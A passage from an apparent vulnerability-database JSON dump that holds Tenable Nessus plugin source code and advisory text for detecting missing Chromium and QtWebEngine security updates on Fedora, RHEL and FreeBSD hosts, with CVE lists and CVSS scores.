CVE-2017-5127,\n CVE-2017-5128, CVE-2017-5129, CVE-2017-5132,\n CVE-2017-5133, CVE-2017-15386, CVE-2017-15387,\n CVE-2017-15388, CVE-2017-15390, CVE-2017-15392,\n CVE-2017-15394, CVE-2017-15396, CVE-2017-15398.\n\n - QtWebEngineCore: [QTBUG-64032] Fix crash after resizing\n view to be empty.\n\n - QtWebEngine[QML]: Fix loading some favicons including\n qt.io's\n\n - QtWebEngineWidgets: [QTBUG-62147] Fix crash on shutdown\n if a QWebEngineProfile was child of QApplication.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-15b815b9b7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected qt5-qtwebengine package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"qt5-qtwebengine-5.9.3-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:11:52", "description": "An update of QtWebEngine to the security and bugfix release 5.9.3,\nincluding :\n\n - Security fixes from Chromium up to version 62.0.3202.89.\n Including: CVE-2017-5124, CVE-2017-5126, CVE-2017-5127,\n CVE-2017-5128, CVE-2017-5129, CVE-2017-5132,\n CVE-2017-5133, CVE-2017-15386, CVE-2017-15387,\n CVE-2017-15388, CVE-2017-15390, CVE-2017-15392,\n CVE-2017-15394, CVE-2017-15396, CVE-2017-15398.\n\n - QtWebEngineCore: [QTBUG-64032] Fix crash after resizing\n view to be empty.\n\n - QtWebEngine[QML]: Fix loading some favicons including\n qt.io's\n\n - QtWebEngineWidgets: [QTBUG-62147] Fix crash on shutdown\n if a QWebEngineProfile was child of QApplication.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-05T00:00:00", "title": "Fedora 25 : qt5-qtwebengine (2017-9015553e3d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-15390", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-15398", "CVE-2017-15386", "CVE-2017-15396", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5124"], "modified": "2017-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-9015553E3D.NASL", "href": "https://www.tenable.com/plugins/nessus/105012", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-9015553e3d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105012);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-15386\", \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15390\", \"CVE-2017-15392\", \"CVE-2017-15394\", \"CVE-2017-15396\", \"CVE-2017-15398\", \"CVE-2017-5124\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5132\", \"CVE-2017-5133\");\n script_xref(name:\"FEDORA\", value:\"2017-9015553e3d\");\n\n script_name(english:\"Fedora 25 : qt5-qtwebengine (2017-9015553e3d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update of QtWebEngine to the security and bugfix release 5.9.3,\nincluding :\n\n - Security fixes from Chromium up to version 62.0.3202.89.\n Including: CVE-2017-5124, CVE-2017-5126, CVE-2017-5127,\n CVE-2017-5128, CVE-2017-5129, CVE-2017-5132,\n CVE-2017-5133, CVE-2017-15386, CVE-2017-15387,\n CVE-2017-15388, CVE-2017-15390, CVE-2017-15392,\n CVE-2017-15394, CVE-2017-15396, CVE-2017-15398.\n\n - QtWebEngineCore: [QTBUG-64032] Fix crash after resizing\n view to be empty.\n\n - QtWebEngine[QML]: Fix loading some favicons including\n qt.io's\n\n - QtWebEngineWidgets: [QTBUG-62147] Fix crash on shutdown\n if a QWebEngineProfile was child of QApplication.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-9015553e3d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected qt5-qtwebengine package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"qt5-qtwebengine-5.9.3-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T20:11:58", "description": "An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 62.0.3202.62.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Chromium\nto crash, execute arbitrary code, or disclose sensitive information\nwhen visited by the victim. (CVE-2017-5124, CVE-2017-5125,\nCVE-2017-5126, CVE-2017-5127, CVE-2017-5128, CVE-2017-5129,\nCVE-2017-5130, CVE-2017-5132, CVE-2017-5131, CVE-2017-5133,\nCVE-2017-15386, CVE-2017-15387, CVE-2017-15388, CVE-2017-15389,\nCVE-2017-15390, CVE-2017-15391, CVE-2017-15392, CVE-2017-15393,\nCVE-2017-15394, CVE-2017-15395)", "edition": 22, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-10-23T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2017:2997)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "modified": "2017-10-23T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2017-2997.NASL", "href": "https://www.tenable.com/plugins/nessus/104091", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2997. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104091);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2017-15386\", \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\", \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\", \"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5130\", \"CVE-2017-5131\", \"CVE-2017-5132\", \"CVE-2017-5133\");\n script_xref(name:\"RHSA\", value:\"2017:2997\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2017:2997)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 62.0.3202.62.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Chromium\nto crash, execute arbitrary code, or disclose sensitive information\nwhen visited by the victim. (CVE-2017-5124, CVE-2017-5125,\nCVE-2017-5126, CVE-2017-5127, CVE-2017-5128, CVE-2017-5129,\nCVE-2017-5130, CVE-2017-5132, CVE-2017-5131, CVE-2017-5133,\nCVE-2017-15386, CVE-2017-15387, CVE-2017-15388, CVE-2017-15389,\nCVE-2017-15390, CVE-2017-15391, CVE-2017-15392, CVE-2017-15393,\nCVE-2017-15394, CVE-2017-15395)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://chromereleases.googleblog.com/2017/10/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:2997\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5129\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5132\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5133\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:2997\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-62.0.3202.62-2.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-62.0.3202.62-2.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-62.0.3202.62-2.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-62.0.3202.62-2.el6_9\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:56:58", "description": "Google Chrome Releases reports :\n\n35 security fixes in this release, including :\n\n- [762930] High CVE-2017-5124: UXSS with MHTML. Reported by Anonymous\non 2017-09-07\n\n- [749147] High CVE-2017-5125: Heap overflow in Skia. Reported by\nAnonymous on 2017-07-26\n\n- [760455] High CVE-2017-5126: Use after free in PDFium. Reported by\nLuat Nguyen on KeenLab, Tencent on 2017-08-30\n\n- [765384] High CVE-2017-5127: Use after free in PDFium. Reported by\nLuat Nguyen on KeenLab, Tencent on 2017-09-14\n\n- [765469] High CVE-2017-5128: Heap overflow in WebGL. Reported by\nOmair on 2017-09-14\n\n- [765495] High CVE-2017-5129: Use after free in WebAudio. Reported by\nOmair on 2017-09-15\n\n- [718858] High CVE-2017-5132: Incorrect stack manipulation in\nWebAssembly. Reported by Gaurav Dewan of Adobe Systems India Pvt. Ltd.\non 2017-05-05\n\n- [722079] High CVE-2017-5130: Heap overflow in libxml2. Reported by\nPranjal Jumde on 2017-05-14\n\n- [744109] Medium CVE-2017-5131: Out of bounds write in Skia. Reported\nby Anonymous on 2017-07-16\n\n- [762106] Medium CVE-2017-5133: Out of bounds write in Skia. Reported\nby Aleksandar Nikolic of Cisco Talos on 2017-09-05\n\n- [752003] Medium CVE-2017-15386: UI spoofing in Blink. Reported by\nWenXu Wu of Tencent's Xuanwu Lab on 2017-08-03\n\n- [756040] Medium CVE-2017-15387: Content security bypass. Reported by\nJun Kokatsu on 2017-08-16\n\n- [756563] Medium CVE-2017-15388: Out of bounds read in Skia. Reported\nby Kushal Arvind Shah of Fortinet's FortiGuard Labs on 2017-08-17\n\n- [739621] Medium CVE-2017-15389: URL spoofing in Omnibox. Reported by\nxisigr of Tencent's Xuanwu Lab on 2017-07-06\n\n- [750239] Medium CVE-2017-15390: URL spoofing in Omnibox. Reported by\nHaosheng Wang on 2017-07-28\n\n- [598265] Low CVE-2017-15391: Extension limitation bypass in\nExtensions. Reported by Joao Lucas Melo Brasio on 2016-03-28\n\n- [714401] Low CVE-2017-15392: Incorrect registry key handling in\nPlatformIntegration. Reported by Xiaoyin Liu on 2017-04-22\n\n- [732751] Low CVE-2017-15393: Referrer leak in Devtools. Reported by\nSvyat Mitin on 2017-06-13\n\n- [745580] Low CVE-2017-15394: URL spoofing in extensions UI. Reported\nby Sam on 2017-07-18\n\n- [759457] Low CVE-2017-15395: NULL pointer dereference in\nImageCapture. Reported by Johannes Bergman on 2017-08-28\n\n- [775550] Various fixes from internal audits, fuzzing and other\ninitiatives", "edition": 30, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-10-23T00:00:00", "title": "FreeBSD : chromium -- multiple vulnerabilities (a692bffe-b6ad-11e7-a1c2-e8e0b747a45a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5128", "CVE-2017-5132", "CVE-2017-5131", "CVE-2017-15395", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-5133", "CVE-2017-15392", "CVE-2017-5125", "CVE-2017-15389", "CVE-2017-15387", "CVE-2017-5126", "CVE-2017-15393", "CVE-2017-5127", "CVE-2017-15386", "CVE-2017-15388", "CVE-2017-5129", "CVE-2017-15394", "CVE-2017-5130", "CVE-2017-5124"], "modified": "2017-10-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:chromium"], "id": "FREEBSD_PKG_A692BFFEB6AD11E7A1C2E8E0B747A45A.NASL", "href": "https://www.tenable.com/plugins/nessus/104063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104063);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-15386\", \"CVE-2017-15387\", \"CVE-2017-15388\", \"CVE-2017-15389\", \"CVE-2017-15390\", \"CVE-2017-15391\", \"CVE-2017-15392\", \"CVE-2017-15393\", \"CVE-2017-15394\", \"CVE-2017-15395\", \"CVE-2017-5124\", \"CVE-2017-5125\", \"CVE-2017-5126\", \"CVE-2017-5127\", \"CVE-2017-5128\", \"CVE-2017-5129\", \"CVE-2017-5130\", \"CVE-2017-5131\", \"CVE-2017-5132\", \"CVE-2017-5133\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (a692bffe-b6ad-11e7-a1c2-e8e0b747a45a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n35 security fixes in this release, including :\n\n- [762930] High CVE-2017-5124: UXSS with MHTML. Reported by Anonymous\non 2017-09-07\n\n- [749147] High CVE-2017-5125: Heap overflow in Skia. Reported by\nAnonymous on 2017-07-26\n\n- [760455] High CVE-2017-5126: Use after free in PDFium. Reported by\nLuat Nguyen on 